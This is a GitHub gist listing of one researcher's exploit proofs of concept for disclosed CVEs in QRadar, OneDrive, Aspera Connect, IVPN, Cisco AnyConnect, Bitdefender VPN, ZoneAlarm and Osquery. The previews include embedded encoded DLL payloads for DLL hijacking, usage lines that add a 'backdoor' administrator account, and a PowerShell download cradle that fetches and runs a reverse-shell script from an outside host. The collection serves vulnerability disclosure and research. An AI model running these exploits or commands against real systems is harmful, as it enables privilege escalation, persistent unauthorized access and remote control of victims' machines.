Yorick Koster ykoster
ykoster
/ qradar_rss_ssrf.py
Created
April 16, 2020 07:47
QRadar RssFeedItem Server-Side Request Forgery vulnerability (CVE-2020-4294) proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import json | |
| import random | |
| import urllib3 | |
| import requests | |
| import urllib.parse | |
| base_url='https://127.0.0.1/' | |
| username='admin' | |
| password='initial' |
ykoster
/ qradar_run-result-reader_lpe.sh
Created
April 16, 2020 07:43
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| trap cleanup INT | |
| function cleanup() | |
| { | |
| if [ -f /tmp/run-result-reader.sh ] | |
| then | |
| /usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh | |
| /usr/bin/rm -f /tmp/run-result-reader.sh | |
| fi |
ykoster
/ Start-ProcessAMSelfElevate.psm1
Last active
July 12, 2023 14:45
PowerShell module to interact with the Self-Elevation functionality of Ivanti AppSense Application Manager
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module can be used to invoke the Self-Elevation functionality of | |
| Ivanti AppSense Application Manager | |
| .Description | |
| This module uses the AMShellIntegration.AMShellContextMenu COM component to | |
| invoke the Self-Elevation functionality of Ivanti AppSense Application | |
| Manager. |
ykoster
/ OneDriveQtDllHijack.ps1
Created
March 23, 2020 08:01
Microsoft OneDrive client Qt plugin hijack proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # kill OneDrive if it's running | |
| Get-Process -Name OneDrive -ErrorAction SilentlyContinue | Stop-Process -ErrorAction SilentlyContinue | |
| # embedded 32-bit DLL that runs calc.exe | |
| $EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpD |
ykoster
/ AsperaConnectQtDllHijack.ps1
Last active
September 10, 2020 06:53
CVE-2020-4545: IBM Aspera Connect for Windows Qt plugin hijack proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # embedded 32-bit DLL that runs calc.exe | |
| $EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpDkINKfKNH3HuX6FpkrXMR5o0LtAWNexjSg39NFBuAv06zoknM0uQRAhS6o2ZfeUmxg0LrHapIF7o2gwxXv9Z7T+VJRbBRxTzmW2Q6NvnaGEco+ChD2pSA3FepRyd5nEVH97cW7gt |
ykoster
/ Invoke-ExploitIVPNLPE.psd1
Last active
March 13, 2020 06:49
IVPN <= 2.11.3 exploit module to run commands with SYSTEM privileges
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Example usage: | |
| Import-Module .\Invoke-ExploitIVPNLPE.psd1 | |
| Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
| Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
| Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')" | |
| #> | |
| @{ | |
| RootModule = 'Invoke-ExploitIVPNLPE.psm1' | |
| ModuleVersion = '1.0' |
ykoster
/ Invoke-ExploitAnyConnectPathTraversal.psm1
Last active
May 5, 2021 23:19
Proof of concept for CVE-2020-3153 - Cisco AnyConnect elevation of privileges due to insecure handling of path names - https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
| .Description | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
| When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
| This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen. | |
| Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges. |
ykoster
/ Invoke-ExploitBdVpnLpe.psm1
Created
January 31, 2020 22:35
Exploit module for Bitdefender VPN for Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Exploit module for Bitdefender VPN for Windows | |
| .Parameter Command | |
| Command(s) to be executed when openvpn.exe is started | |
| .Example | |
| Import-Module .\Invoke-ExploitBdVpnLpe.psm1 | |
| Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" |
ykoster
/ Invoke-ExploitZoneAlarmLPE.psm1
Last active
March 19, 2020 17:44
ZoneAlarm (< v15.8.043.18324) TrueVector Internet Monitor service insecure NTFS permissions vulnerability proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module exploits a vulnerability in the TrueVector Internet Monitor service of CheckPoint ZoneAlarm to gain elevated privileges | |
| .Description | |
| This module exploits a vulnerability in the TrueVector Internet Monitor service, which is installed as part of CheckPoint ZoneAlarm. | |
| The affected service is running as LocalSystem, it will periodically create a number of backup files within the ProgramData folder. | |
| When these files are created, their file permissions are explicitly set to Full Control for Authenticated Users. | |
| A local attacker can create a hardlink with the same name as the backup files, causing the permissions of another file to be changed. |
ykoster
/ Invoke-ExploitOsqueryLPE.psm1
Created
December 29, 2019 16:08
Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege (https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege | |
| .Description | |
| This modules exploits a vulnerability in Osquery < 3.4.0. | |
| It was found that Osquery is installed in %ProgramData%, which has weak file permissions. | |
| A local user can exploit this issue to run arbitrary code with SYSTEM privileges. | |
| https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html |